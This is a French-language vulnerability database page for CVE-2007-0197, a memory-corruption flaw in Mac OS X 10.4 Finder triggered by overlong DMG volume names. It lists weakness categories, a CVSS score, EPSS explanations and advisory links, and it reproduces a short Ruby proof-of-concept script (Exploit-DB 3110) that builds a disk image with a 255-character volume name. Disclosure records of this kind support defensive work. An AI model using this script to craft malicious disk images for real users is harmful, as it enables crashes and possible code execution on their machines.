CVE-2007-0197 : Détail

CVE-2007-0197

Overflow
A03-Injection
53.85%V4
Network
2007-01-11
10h00 +00:00
2018-10-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Finder 10.4.6 on Apple Mac OS X 10.4.8 allows user-assisted remote attackers to cause a denial of service and possibly execute arbitrary code via a long volume name in a DMG disk image, which results in memory corruption.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3110

Date de publication : 2007-01-08 23h00 +00:00
Auteur : MoAB
EDB Vérifié : Yes

#!/usr/bin/ruby # (c) 2006 LMH <lmh [at] infopull.com>. # require 'fileutils' require 'zlib' hdiutil = "/usr/bin/hdiutil" dmgname = (ARGV[0] || "MOAB-09-01-2007.dmg") dmgsize = (ARGV[1] || "200k") filesys = (ARGV[2] || "UFS") volname = "" 255.times do volname << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr end FileUtils.rm_f(dmgname) system "#{hdiutil} create #{dmgname} -size #{dmgsize} -fs #{filesys} -volname #{volname}" puts "++ reading #{dmgname}..." dmg_stream = File.read(dmgname) dmg_vnsize = dmg_stream[0x9c10,0x9c14].unpack("C2") puts "++ volname length at dmg: #{dmg_vnsize}" puts "++ dmg size: #{dmg_stream.size} bytes." # milw0rm.com [2007-01-09]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.4.6

Apple>>Mac_os_x >> Version 10.4.8

Références

http://www.vupen.com/english/advisories/2007/0140
Tags : vdb-entry, x_refsource_VUPEN
http://www.us-cert.gov/cas/techalerts/TA07-047A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/24198
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/32714
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/21980
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/240880
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securitytracker.com/id?1017662
Tags : vdb-entry, x_refsource_SECTRACK